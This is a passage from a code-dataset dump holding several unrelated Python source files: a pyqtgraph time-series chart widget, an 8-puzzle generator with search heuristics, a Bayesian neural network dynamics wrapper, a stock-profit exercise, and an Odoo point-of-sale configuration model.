pg.setConfigOption('foreground', 'k')\n\n # create keys to populate KeysListWidget ..............................\n keys = []\n for name in names_ordering:\n keys.append(Key(\n name=name,\n enabled=enabled_states_by_names[name],\n color=colors_by_names[name],\n ))\n\n # build widgets .......................................................\n w_chart = pg.PlotWidget(\n parent=self,\n labels={'bottom': 'time (s)'},\n )\n\n w_scroll = QtWidgets.QScrollArea(\n parent=self,\n )\n\n w_list = KeysListWidget(\n keys=keys,\n parent=self,\n )\n\n w_chart.setMinimumSize(600, 50)\n w_scroll.horizontalScrollBar().setEnabled(False)\n w_scroll.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n w_scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n# w_chart.setBackground('w')\n\n w_scroll.setWidget(w_list)\n\n layout = QtWidgets.QHBoxLayout()\n self.setLayout(layout)\n\n layout.addWidget(w_scroll, 0)\n layout.addWidget(w_chart, 1)\n\n self.w_chart = w_chart\n self.w_list = w_list\n\n # build plotItem ......................................................\n plot_items_by_names = _pyr.m().evolver()\n\n for name, enabled in enabled_states_by_names.items():\n color = colors_by_names[name]\n\n if enabled:\n pi = w_chart.plot(\n times_by_names[name],\n timeseries[name],\n pen=pg.mkPen(color=color),\n )\n plot_items_by_names.set(name, pi)\n\n plot_items_by_names = plot_items_by_names.persistent()\n self.plot_items_by_names = plot_items_by_names\n\n\n # plot regions ........................................................\n self.region_items = _pyr.v()\n self.bounds = ()\n\n # connecting to signals ...............................................\n w_list.requestEnableChange.connect(self._hdl_enable_state_toggled)\n w_list.requestColorChange.connect(self._hdl_color_changed)\n# self.set_regions_bounds(\n# ((0.0, 0.2),\n# (1.0, 1.2),\n# (2.0, 2.1),\n# )\n# )\n\n\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def draw_regions(self, regions):\n pass\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def draw_data(self, data):\n pass\n\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def setXLink(self, chart):\n \"\"\"\n Link this view’s X axis to another view of a Chart object.\n \"\"\"\n self.w_chart.setXLink(chart.w_chart)\n\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def set_link(self, link):\n link.sig_regions_bounds.connect(self.set_regions_bounds)\n self.regionChanged.connect(link.set_regions_bounds)\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def decorate(self, decorations):\n \"\"\"\n dict:\n {\n bounds:(x, y, z),\n data:{\n name_0: (ax, ay, az),\n name_1: (bx, by, bz),\n }\n }\n \"\"\"\n new_bounds = decorations['bounds']\n\n self.set_regions_bounds(new_bounds)\n\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def set_regions_bounds(self, bounds):\n new_bounds = bounds\n old_bounds = self.bounds\n\n if self.FLAG_REGION_CHANGING:\n# logger.debug('{} : skipping loop update'\n# 'decoration'.format(self.name))\n return\n\n if new_bounds == old_bounds:\n logger.debug('#{} :: skipping update '\n 'decoration: {} == {}'.format(self.name, old_bounds, new_bounds))\n return\n\n new_region_items = self.region_items.evolver()\n\n delta = len(new_bounds) - len(old_bounds)\n if delta > 0:\n com = len(old_bounds)\n add = delta\n rem = 0\n\n elif delta < 0:\n com = len(new_bounds) + delta\n add = 0\n rem = abs(delta)\n\n else:\n com = len(new_bounds)\n add = 0\n rem = 0\n\n logger.debug('#{} :: com:{} \\t add:{} \\t rem:{}'.format(\n self.name,\n com, add, rem))\n\n # update regions\n for idx in range(com):\n\n if len(new_bounds[idx]) == 3:\n *bs, selected = new_bounds[idx]\n else:\n bs = new_bounds[idx]\n selected = False\n\n r = new_region_items[idx]\n r.setRegion(bs)\n r.set_identifier(str(idx))\n r.set_selected(selected)\n\n # create new regions\n for idx in range(com, com + add):\n\n if len(new_bounds[idx]) == 3:\n *bs, selected = new_bounds[idx]\n else:\n bs = new_bounds[idx]\n selected = False\n\n# bs = new_bounds[idx]\n r = CustomLinearRegionItem(\n identifier=str(idx),\n values=bs,\n orientation=pg.LinearRegionItem.Vertical,\n brush=pg.mkBrush(color=(50, 40, 80, 100)),\n bounds=(0.0, None),\n )\n r.set_selected(selected)\n\n self.w_chart.addItem(r)\n new_region_items.append(r)\n r.usr_bounds_changed.connect(self._hdl_region_changed)\n logger.debug('#{} :: creates {}'.format(self.name, r))\n r.usr_bounds_changed.connect(\n lambda bs: logger.debug('usr changes bounds region {}'.format(bs)),\n )\n\n r.usr_bounds_change_finished.connect(\n lambda bs: logger.debug('usr has finished to edit region bounds {}'.format(bs)),\n )\n\n # removing regions\n for idx in range(com, com + rem):\n r = new_region_items[-1]\n r.usr_bounds_changed.disconnect(self._hdl_region_changed)\n self.w_chart.removeItem(r)\n logger.debug('#{} :: removes {}'.format(self.name, r))\n\n new_region_items.delete(-1)\n r.deleteLater()\n\n self.region_items = new_region_items.persistent()\n self.bounds = new_bounds\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def _refresh_list(self):\n keys = []\n for name in self.names_ordering:\n keys.append(Key(\n name=name,\n enabled=self.enabled_states_by_names[name],\n color=self.colors_by_names[name],\n ))\n\n self.w_list.update_data(keys)\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def _hdl_enable_state_toggled(self, name):\n logger.debug('request toggle enabled state for [{}]'.format(name))\n\n enabled_states_by_names = self.enabled_states_by_names\n\n new_enabled_states_by_names = enabled_states_by_names.transform(\n [name],\n lambda e: not e,\n )\n\n # determining plot(s) to be added and removed\n old_enabled = [n for n, b in enabled_states_by_names.items() if b is True]\n new_enabled = [n for n, b in new_enabled_states_by_names.items() if b is True]\n old_enabled = set(old_enabled)\n new_enabled = set(new_enabled)\n\n names_to_be_added = new_enabled.difference(old_enabled)\n names_to_be_removed = old_enabled.difference(new_enabled)\n\n logger.debug('names to be added: {}'.format(names_to_be_added))\n logger.debug('names to be removed: {}'.format(names_to_be_removed))\n\n for name in names_to_be_removed:\n pi = self.plot_items_by_names[name]\n self.w_chart.removeItem(pi)\n\n for name in names_to_be_added:\n color = self.colors_by_names[name]\n pi = self.w_chart.plot(\n self.times_by_names[name],\n self.timeseries[name],\n pen=pg.mkPen(color=color),\n )\n\n\n self.plot_items_by_names = self.plot_items_by_names.set(name, pi)\n\n # updating list\n keys = []\n for name in self.names_ordering:\n keys.append(Key(\n name=name,\n enabled=new_enabled_states_by_names[name],\n color=self.colors_by_names[name],\n ))\n\n self.w_list.update_data(keys)\n\n self.enabled_states_by_names = new_enabled_states_by_names\n\n pi = self.w_chart.getPlotItem()\n axis_bottom = pi.getAxis('bottom')\n logger.debug('xaxis: {}'.format(axis_bottom.range))\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def _hdl_region_changed(self):\n self.FLAG_REGION_CHANGING = True\n bounds = []\n\n for region in self.region_items:\n bound = region.getRegion()\n bounds.append(bound)\n\n bounds = tuple(bounds)\n self.regionChanged.emit(bounds)\n self.FLAG_REGION_CHANGING = False\n\n\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n def _hdl_color_changed(self, name):\n w_color = QtWidgets.QColorDialog(self)\n old_color = self.colors_by_names[name]\n old_qcolor = QtGui.QColor(*old_color)\n\n new_qcolor = w_color.getColor(old_qcolor)\n\n if not new_qcolor.isValid():\n logger.debug('usr has cancelled color pick for [{}]. '.format(name))\n return\n\n new_color = (\n new_qcolor.red(),\n new_qcolor.green(),\n new_qcolor.blue()\n )\n\n logger.debug('usr pick color for [{}]: {}'.format(name, new_color))\n\n # update colors\n self.colors_by_names = self.colors_by_names.transform(\n [name],\n new_color,\n )\n # update color for list in chart\n self._refresh_list()\n\n # update color for plotItem in chart\n try:\n pi = self.plot_items_by_names[name]\n pi.setPen(pg.mkPen(color=new_color))\n except KeyError:\n pass\n\n","sub_path":"src/ddf/gui/obs/OBS_editor.py","file_name":"OBS_editor.py","file_ext":"py","file_size_in_byte":21579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"200493434","text":"#Write a program that gets 2 string variables and 2 number variables from the\n#user, concatenates (joins them together with no spaces) and displays the\n#strings, then multiplies the two numbers on a new line.\nthingee = float(input(\"write a number\"))\nends = float(input(\"write another number\"))\nsee = str(input(\"write what you see \"))\neat = str(input(\"write what you will eat \"))\nprint(see + eat)\nprint(thingee + ends)\n\n \n \n \n\n \n \n","sub_path":"pythonExercises/src/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347304808","text":"\n# author. : dhawal gupta\n# input is working\n\nimport random\nimport numpy as np\n'''\ncheck points\n\n'''\n\n\ndef h1(current_state, goal_state):\n\t# COmpute the h1 score which is 0 for the current approach\n\treturn 0\n\t# pass\n\ndef h2(current, goal):\n\t# compute the h2 score of the current and teh goal state which is the number\n\t# h2 = number of displaced tiles\n\tcost = np.sum(~(goal == current))\n\treturn cost\n\ndef h3(current, goal, current_hash = None, goal_hash = None):\n\t'''\n\tCurrent : THe current state in an numpy array\n\tGoal : The current goal numpy array\n\tcurrent_hash : The hash of the current state\n\tgoal_hash : The hash of the goal state\n\treturn : THe h3 (manhattan based distance)\n\t'''\n\t# this will take the min steps required to move the blocks form the current positino to the goal positin\n\tcost = 0\n\tif current_hash == None:\n\t\tcurrent_hash = dict()\n\t\t# if the state_hash is none the create the same\n\t\tcurrent_hash = dict()\n\t\tfor row in range(len(goal_hash)):\n\t\t\tfor col in range(len(goal_hash[0])):\n\t\t\t\tcurrent_hash[state[row][col]] = [row,col]\n\tif goal_hash == None:\n\t\tgoal_hash = dict()\n\t\t# if the state_hash is none the create the same\n\t\tstate_hash = dict()\n\t\tfor row in range(len(goal_hash)):\n\t\t\tfor col in range(len(goal_hash[0])):\n\t\t\t\tgoal_hash[state[row][col]] = [row,col]\n\t# now we will compute the score for the states\n\tfor row in range(len(current)):\n\t\tfor col in range(len(current[0])):\n\t\t\t# here we will accouting the distance for the blank as well\n\t\t\tx,y = goal_hash[current[row][col]]\n\t\t\t# we will take the abs of both\n\t\t\tcost = cost + abs(row - x ) + abs(col - y)\n\treturn cost\n\ndef h4(current, goal):\n\t# this will implement the upper bound on the h* function\n\tpass\n\n\ndef valid_action(state, action, state_hash = None): # state hash is not very useful but keeping oit to make it eacy tpt worj 2ith\n\t# check the validity of the action\n\t# we have to invert x, y positino as row represent the y coordinte and the col represents the x coordinate\n\tif state_hash == None:\n\t\t# if the state_hash is none the create the same\n\t\tstate_hash = dict()\n\t\tfor row in range(len(state)):\n\t\t\tfor col in range(len(state[0])):\n\t\t\t\tstate_hash[state[row][col]] = [row,col]\n\n\tr,c = state.shape\n\ty,x = state_hash[0] # get the position of the blank\n\tif action == 0:\n\t\tif y == 0 : # blank already in the first line\n\t\t\treturn False\n\tif action == 1: # left valid_action\n\t\tif x == 0:\n\t\t\treturn False\n\tif action == 2: # right valid_act\n\t\tif x == c-1:\n\t\t\treturn False\n\tif action == 3:\n\t\tif y == r-1:\n\t\t\treturn False\n\treturn True\n\n\ndef execute_action(state,action , state_hash = None):\n\t'''\n\tstate : the state onto which action has to be executed\n\tstate_hash : THe hash of the state\n\taction : The action that has to be execute \" action are U, L, R, D - up (0), left (1), right (2), down (3)\"\n\treturn : state, state_hash , if the action is not valid state is note changed\n\t'''\n\tif state_hash == None:\n\t\t# if the state_hash is none the create the same\n\t\tstate_hash = dict()\n\t\tfor row in range(len(state)):\n\t\t\tfor col in range(len(state[0])):\n\t\t\t\tstate_hash[state[row][col]] = [row,col]\n\n\t# get the blank coordinate\n\tr,c = state.shape # the size of the game\n\ty,x = state_hash[0] # the blank coordinate\n\t# now execute the action and send the update states\n\t# print \"Blank Position {}, {}\".format(x,y)\n\n\tx_new, y_new = [0,0]\n\tif valid_action(state,action, state_hash):\n\t\t# if the given action is valud\n\t\tif action == 0:\n\t\t\tx_new = x\n\t\t\ty_new = y - 1\n\t\tif action == 1: # left valid_action\n\t\t\tx_new = x-1\n\t\t\ty_new = y\n\t\tif action == 2: # right valid_act\n\t\t\tx_new = x + 1\n\t\t\ty_new = y\n\t\tif action == 3:\n\t\t\tx_new = x\n\t\t\ty_new = y + 1\n\t\t# getting the new position of the blank we will move the blank to the\n\t\t# and the element from that position to the blank position\n\t\ttile = state[y_new][x_new]\n\t\tstate_hash[tile] = [y,x] # modify the position of the tile to the position of the blank\n\t\tstate_hash[0] = [y_new, x_new]\n\t\tnew_state = state.copy()\n\n\t\tnew_state[y_new, x_new ] = 0\n\t\tnew_state[y,x] = tile\n\t\treturn (new_state,state_hash)\n\telse:\n\t\tprint (\"Action not valid\")\n\n\t\t# move blank up\n\ndef arreq_in_list(myarr, list_arrays):\n\t# funtion to check if the myarr exists in the liust_arraus\n return next((True for elem in list_arrays if np.array_equal(elem, myarr)), False)\n\n\n\n# first we will read the input from the file\nstart_state = \"start.txt\" # this will contain the start the state of the agnet\nend_state = \"end.txt\" # this file will contain the end or goal state of the agent\n\n# assumong the puzzle is only 3x3 and no bigger\nstate = np.zeros((3,3))\ngoal = np.zeros((3,3))\nstate_hash = dict()\ngoal_hash = dict()\n\n\n# we will represent the blank state as 0 for out case\n\nwith open(start_state) as fil:\n\t# read the fule\n\trow = 0 # the currebt row\n\tline = fil.readline()\n\twhile line:\n\t\tfor col,no in enumerate(line.split()):\n\t\t\tstate[row][col] = no\n\t\tline = fil.readline()\n\t\trow = row + 1\n\n\n\t# pass\n\nwith open(end_state) as fil:\n\t# read the goal state\n\trow = 0 # the currebt row\n\tline = fil.readline()\n\twhile line:\n\t\tfor col,no in enumerate(line.split()):\n\t\t\tgoal[row][col] = no\n\t\tline = fil.readline()\n\t\trow = row + 1\n\t# pass\n\n# Fill the goal and state hashed to make operations faster\n\nfor row in range(len(state)):\n\tfor col in range(len(state[0])):\n\t\tgoal_hash[goal[row][col]] = [row,col]\n\t\tstate_hash[state[row][col]] = [row,col]\n\n\ndef generate_puzzle(goal,steps = 1000):\n\t'''\n\t:param goal: The goal state from which we have to produce the puzzle\n\t:para steps: The number of random action to be taken\n\t:return: Return the puzzled matrix\n\t'''\n\tpuzzle = goal.copy()\n\t# print(valid_action(puzzle, 0))\n\tshuffle = int(steps)\n\taction = 0\n\tfor step in range(shuffle):\n\t\taction = random.randint(0, 3)\n\t\t# print(type(action))\n\t\tif valid_action(puzzle, action): # if the action is vald\n\t\t\tpuzzle = execute_action(puzzle, action)[0]\n\treturn puzzle\n\n\nif __name__ == \"__main__\":\n\tpuzzle = goal.copy()\n\tprint(valid_action(puzzle, 0))\n\tshuffle = int(1e4)\n\taction = 0\n\tfor step in range(shuffle):\n\t\taction = random.randint(0,3)\n\t\t# print(type(action))\n\t\tif valid_action(puzzle, action) : # if the action is vald\n\t\t\tpuzzle = execute_action(puzzle, action)[0]\n\tprint(puzzle)\n\n","sub_path":"Assignments/Assignment2/make_puzzle.py","file_name":"make_puzzle.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544170890","text":"from torchpruner.attributions import RandomAttributionMetric # or any of the methods above\nfrom torchpruner.pruner import Pruner\n\nimport torch\nif __name__ == '__main__':\n\n model = torch.load(\"./初始模型.pkl\")\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n attr = RandomAttributionMetric(model, data_generator, criterion, device)\n for module in model.children():\n if len(list(module.children())) == 0: # leaf module\n scores = attr.run(module)\n print (scores)","sub_path":"TorchPruner-master/torchpruner/pruning.py","file_name":"pruning.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"576062796","text":"'''\nA wrapper of BNN for a consistent interface with variance propagation\n'''\n\nfrom __future__ import print_function\nimport tensorflow as tf\n\nimport numpy as np\nimport scipy\n\n# from . DotmapUtils import *\nfrom bnn_dyn.FC import FC\nfrom bnn_dyn.BNN import BNN\n\nfrom dotmap import DotMap\n\nclass BNNDynamics(object):\n def __init__(self, layers, n_nets=5, name=\"bnn_model\", sess=None, output_activation=None):\n self.n_ensemble = n_nets\n\n if isinstance(layers, str):\n model_dir = layers\n load_model = True\n else:\n load_model = False\n model_dir = None\n\n params = DotMap(\n name=name, num_networks=n_nets,\n sess=sess, load_model=load_model,\n model_dir=model_dir\n )\n self.bnn_model = BNN(params)\n\n #construct layers if not loaded\n if not load_model:\n #the layers indicate dimensions of each layers\n self.input_dim = layers[0]\n for i in range(len(layers)-2):\n if i == 0:\n self.bnn_model.add(FC(layers[1], input_dim=layers[0], activation=\"swish\", weight_decay=0.000025))\n else:\n self.bnn_model.add(FC(layers[i+1], activation=\"swish\", weight_decay=0.000075))\n #output, linear output\n self.bnn_model.add(FC(layers[-1], activation=output_activation, weight_decay=0.0001))\n self.bnn_model.finalize(tf.train.AdamOptimizer, {\"learning_rate\": 0.001})\n else:\n self.input_dim = self.bnn_model.layers[0].input_dim\n\n #put training parameters here for further tunning\n self.batch_size=32\n self.epochs=100\n self.hide_progress=False\n self.holdout_ratio=0.0\n self.max_logging=5000\n return\n \n def train(self, inputs, outputs):\n self.bnn_model.train(inputs, outputs, self.batch_size, self.epochs, \n self.hide_progress, self.holdout_ratio, self.max_logging)\n\n return\n \n def predict_f(self, inputs):\n return self.bnn_model.predict(inputs, factored=False)\n\n def predict_trajs(self, X0, U=[None]*9, n_particles=20, prop='TSInf', state_proc=lambda x:x, state_postproc=lambda x, pred:pred, prob=True):\n '''\n predict trajectories for given init states\n following the trajectory sampling schemes like TS1 and TSInf but without backpropagate differentiability\n X0: (batch_size, x_dim)\n U: (T, u_dim), control can be augmented with predicted state x, could be None if dynamics is passive. Note the same control applies to entire state batch\n n_particles: number of particles to obtain the empirical distribution of trajectories\n prop: type of particle propagation, TS1/TSInf\n state_proc: process state before it feeds to the dynamics model\n state_postproc: customized process to ensure the next iteration is compatible, e.g., if we pred velocity based on curr pos+vel, we need to augment a pred pos to obtain another pos+vel \n\n return:\n trajs: (batch_size, n_particles, T, x_dim)\n '''\n T = len(U)\n bs = X0.shape[0]\n #preprocess x0\n X_prev = np.vstack([np.tile(x0, (n_particles, 1)) for x0 in X0]) #(batch_size*n_particles, x_dim)\n trajs = np.empty((bs, n_particles, T+1, X_prev.shape[-1]))\n \n for t in range(T):\n trajs[:, :, t, :] = np.reshape(X_prev, (-1, n_particles, X_prev.shape[-1]))\n X_proc = state_proc(X_prev)\n\n if prop == 'TS1':\n #need to resample \n X_proc = np.reshape(X_proc, (-1, n_particles, X_proc.shape[-1])) #(batch_size, n_particles, x_dim)\n #for each batch, generate a permutation\n sort_idx = np.array([np.random.permutation(n_particles) for _ in range(X_proc.shape[0])]) #(batch_size, n_particles)\n #tmp = np.tile(np.arange(X_proc.shape[0])[:, None], [1, n_particles])[:, :, None] #(batch_size) --> (batch_size, 1) --> (batch_size, n_particles) --> (bs, np, 1)\n #have some issues here for TS1, what to use in numpy for tf.gather_nd?\n #idxs = np.concatenate([tmp, sort_idx[:, :, None]], axis=-1) #(bs, np, 2) \n tmp = np.tile(np.arange(X_proc.shape[0])[:, None], [1, n_particles]).flatten() #(batch_size) --> (batch_size, 1) --> (batch_size, n_particles) --> (batch_size*n_particles)\n \n X_proc = X_proc[tmp, sort_idx.flatten(), :] #(bs*np, xdim)\n #X_proc = np.reshape(X_proc, (-1, X_proc.shape[-1])) #(bs*np, xdim)\n\n X_proc = self._expand_to_ts_format(X_proc, n_particles)\n #see if there is control to apply\n if U[t] is not None:\n #combine this control\n U_proc = self._expand_to_ts_format(np.tile(U[t], (bs*n_particles, 1), n_particles))\n inputs = np.concatenate((X_proc, U_proc), axis=-1)\n else:\n inputs = X_proc\n\n mean, var = self.bnn_model.predict(inputs, factored=True)\n if prob:\n #take a sample if we expect a probabilistic output\n pred = mean + np.random.randn(*(mean.shape)) * np.sqrt(var)\n else:\n #take mean as the decision making here\n pred = mean\n\n pred = self._flatten_to_matrix(pred, n_particles)\n if prop == 'TS1':\n '''\n reverse that process\n '''\n pred = np.reshape(pred, (-1, n_particles, pred.shape[-1])) #(bs, np, pdim)\n sort_idx_reversed = np.empty(sort_idx.shape, dtype=int)\n for b in range(sort_idx.shape[0]):\n for i in range(sort_idx.shape[1]):\n sort_idx_reversed[b][sort_idx[b][i]] = i\n #sort_idx = np.array([[b_idx for i, _ in enumerate(b_idx)] for b_idx in sort_idx])\n #idxs = np.concatenate([tmp, sort_idx[:, :, None]], axis=-1)\n #pred = np.take(pred, idxs) \n #pred = np.reshape(pred, (-1, pred.shape[-1]))\n pred = pred[tmp, sort_idx_reversed.flatten(), :]\n\n X_prev = state_postproc(X_prev, pred)\n \n trajs[:, :, T, :] = np.reshape(X_prev, (-1, n_particles, X_prev.shape[-1]))\n return trajs\n \n def _expand_to_ts_format(self, mat, n_particles):\n xdim = mat.shape[-1]\n return np.reshape(np.transpose(np.reshape(mat, (-1, self.n_ensemble, n_particles//self.n_ensemble, xdim)), [1, 0, 2, 3]), [self.n_ensemble, -1, xdim])\n \n def _flatten_to_matrix(self, ts_fmt_arr, n_particles):\n xdim = ts_fmt_arr.shape[-1]\n return np.reshape(np.transpose(np.reshape(ts_fmt_arr, [self.n_ensemble, -1, n_particles//self.n_ensemble, xdim]), [1, 0, 2, 3]), [-1, xdim])\n\n \n","sub_path":"bnn_dyn/bnn_dyn.py","file_name":"bnn_dyn.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"543728694","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n\n # 1. Keep track of lowest price in the list\n lowest = prices[0]\n\n # The max profit must be computed by subtracting some price by another price that comes before it\n max_profit = prices[1] - lowest\n\n # 2. Keep track of current min price so far and max profit so far\n\n for current_price in prices[1:]:\n # Find the highest profit in the list\n max_profit = max(current_price - lowest, max_profit)\n\n # Find the smallest price in the list\n lowest = min(current_price, lowest)\n\n return max_profit\n\n\nprint(find_max_profit([1050, 270, 1540, 3800, 2]))\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22098659","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\nimport logging\nfrom odoo.exceptions import UserError, ValidationError\nimport re\nimport requests\nimport json\nimport base64\n\ntry:\n to_unicode = unicode\nexcept NameError:\n to_unicode = str\n\n_logger = logging.getLogger(__name__)\n\n\nclass PosConfig(models.Model):\n _inherit = \"pos.config\"\n\n def updateCache(self):\n return self.env['pos.call.log'].refresh_logs()\n\n def init(self):\n self.env.cr.execute(\n \"\"\"DELETE FROM ir_model_data WHERE model IN ('pos.bus', 'pos.bus.log', 'pos.tracking.client')\"\"\");\n\n def _get_product_field_char(self):\n product_fields = self.env['ir.model.fields'].search(\n [('model', '=', 'product.product'),\n ('ttype', '=', 'char')])\n return [\n (field.name, field.field_description)\n for field in sorted(product_fields, key=lambda f: f.field_description)\n ]\n\n def _get_customer_field_char(self):\n product_fields = self.env['ir.model.fields'].search(\n [('model', '=', 'res.partner'),\n ('ttype', '=', 'char')])\n return [\n (field.name, field.field_description)\n for field in sorted(product_fields, key=lambda f: f.field_description)\n ]\n\n def _get_picking_field_char(self):\n picking_fields = self.env['ir.model.fields'].search(\n [('model', '=', 'stock.picking'),\n ('ttype', '=', 'char')])\n return [\n (field.name, field.field_description)\n for field in sorted(picking_fields, key=lambda f: f.field_description)\n ]\n\n def _get_invoice_field_char(self):\n invoice_fields = self.env['ir.model.fields'].search(\n [('model', '=', 'account.move'),\n ('ttype', '=', 'char')])\n return [\n (field.name, field.field_description)\n for field in sorted(invoice_fields, key=lambda f: f.field_description)\n ]\n\n printer_id = fields.Many2one(\n 'pos.epson',\n 'Printer Network',\n help='If you choice printer here \\n'\n 'Receipt Invoice willl printing directly to this printer IP'\n )\n floor_ids = fields.Many2many(\n 'restaurant.floor',\n 'pos_config_restaurant_floor_rel',\n 'pos_config_id',\n 'floor_id',\n string=\"Floors\",\n domain=[('id', '!=', None)]\n )\n\n load_coupon_program = fields.Boolean(\n 'Load Coupon Program',\n default=0,\n )\n coupon_program_ids = fields.Many2many(\n 'coupon.program',\n 'pos_config_coupon_program_rel',\n 'pos_config_id',\n 'coupon_id',\n domain=[('program_type', '=', 'promotion_program'), ('promo_applicability', '=', 'on_current_order')],\n string='Coupon Program')\n coupon_giftcard_ids = fields.Many2many(\n 'coupon.program',\n 'pos_config_coupon_giftcard_rel',\n 'pos_config_id',\n 'coupon_giftcard_id',\n domain=[('program_type', '=', 'coupon_program'), ('is_gift_card', '=', True)],\n string='Gift Card Program Template'\n )\n coupon_giftcard_create = fields.Boolean(\n 'Allow POS Create Coupon',\n default=0,\n )\n user_id = fields.Many2one('res.users', 'Assigned to')\n allow_numpad = fields.Boolean('Allow Use Numpad', default=1)\n allow_discount = fields.Boolean('Allow Change Discount', default=1)\n allow_qty = fields.Boolean('Allow Change Quantity', default=1)\n allow_price = fields.Boolean('Allow Change Price', default=1)\n allow_remove_line = fields.Boolean('Allow Remove Line', default=1)\n allow_minus = fields.Boolean('Allow Minus (+/-)', default=1)\n allow_payment = fields.Boolean('Allow Payment', default=1)\n allow_customer = fields.Boolean('Allow set Customer', default=1)\n allow_add_order = fields.Boolean('Allow Add Order', default=1)\n allow_remove_order = fields.Boolean('Allow Remove Order', default=1)\n allow_add_product = fields.Boolean('Allow Add Product', default=1)\n allow_payment_zero = fields.Boolean(\n 'Allow Payment Zero',\n default=1,\n help='If active, cashier can made order total amount smaller than or equal 0')\n allow_closing_session = fields.Boolean(\n default=1,\n string='Allow closing Session',\n help='If POS Users have not inside group Point Of Sale Manager \\n'\n 'And this field is un-checked \\n'\n 'POS Users will could not closing session'\n )\n allow_closing_all_sessions_online = fields.Boolean(\n default=0,\n string='Allow Closing All Sessions Online',\n help='If checked, this POS can closing all POS Sessions \\n'\n 'Of another POS Users direct on POS Screen'\n )\n display_point_receipt = fields.Boolean(\n 'Display Point / Receipt', help='Active this field for display loyalty\\n'\n ' point plus on bill receipt')\n pos_loyalty_id = fields.Many2one(\n 'pos.loyalty', 'Loyalty',\n domain=[('state', '=', 'running')])\n loyalty_combine_promotion = fields.Boolean(\n 'Loyalty Combine Promotion',\n help='If checked: allow each order line, loyalty plus point and promotion apply together \\n'\n 'If not checked: When promotion add to order lines, points will not plus'\n )\n promotion_manual_select = fields.Boolean(\n 'Promotion manual Choice', default=0,\n help='When you check to this checkbox, \\n'\n 'your cashiers will have one button, \\n'\n 'when cashiers clicked on it, \\n'\n 'all promotions active will display for choose')\n promotion_auto_add = fields.Boolean(\n 'Promotion Auto Apply when Do payment',\n help='When you check it,\\n'\n 'when your cashiers click payment button,\\n'\n 'all promotions active auto add to order cart')\n\n create_purchase_order = fields.Boolean('Create PO', default=0)\n create_purchase_order_required_signature = fields.Boolean(\n 'PO Required Signature', default=0)\n purchase_order_state = fields.Selection([\n ('confirm_order', 'Auto Confirm'),\n ('confirm_picking', 'Auto Delivery'),\n ], 'Purchaser Order Auto',\n help='This is state of purchase order will process to',\n default='confirm_order')\n sale_order = fields.Boolean('Create Sale Order', default=0)\n sale_order_auto_confirm = fields.Boolean('Auto Confirm', default=0)\n sale_order_auto_invoice = fields.Boolean('Auto Paid', default=0)\n sale_order_auto_delivery = fields.Boolean('Auto Delivery', default=0)\n sale_order_required_signature = fields.Boolean(\n 'SO Required Signature',\n help='Allow print receipt when create quotation/order')\n\n pos_orders_management = fields.Boolean(\n 'POS Order Management',\n default=0)\n pos_order_tracking = fields.Boolean(\n 'Tracking Order',\n help='Tracking Action of POS User on Order (example: remove/add order, change quantity/discount ....',\n default=1\n )\n pos_order_tracking_remove_when_closing_session = fields.Boolean(\n 'Remove all Tracking Order Logs when Closing Session',\n default=0\n )\n shipping_order = fields.Boolean(\n 'Shipping Order',\n default=1,\n help='Create Customer Order Delivery (COD) \\n'\n 'Allow cashiers create shipping address and save to Order, do partial payment Order \\n'\n 'When Delivery Man success shipping Order, Cashier confirm Order to Paid \\n'\n 'If you active this future, please active Partial Payment too\\n'\n 'For cashier add one part payment of Customer'\n )\n paid_partial = fields.Boolean(\n 'Allow Partial Payment', default=1,\n help='Allow cashiers payment one part of Total Amount Order')\n load_orders_type = fields.Selection([\n ('last_3_days', 'Last 3 Days'),\n ('last_7_days', 'Last 7 Days'),\n ('last_1_month', 'Last 30 Month'),\n ('last_1_year', 'Last 1 Year (365 days)'),\n ('load_all', 'Load All'),\n ],\n default='last_3_days',\n string='Period Days loading Orders'\n )\n pos_orders_load_orders_another_pos = fields.Boolean(\n 'Allow Loading Orders of another POS',\n default=1\n )\n pos_orders_filter_by_branch = fields.Boolean(\n 'POS Order Filter Branch', default=0,\n help='If you checked it, \\n'\n 'pos session could not see orders of another branch')\n pos_order_period_return_days = fields.Float(\n 'Return Period Days',\n help='This is period days allow customer \\n'\n 'can return Order or one part of Order',\n default=30)\n 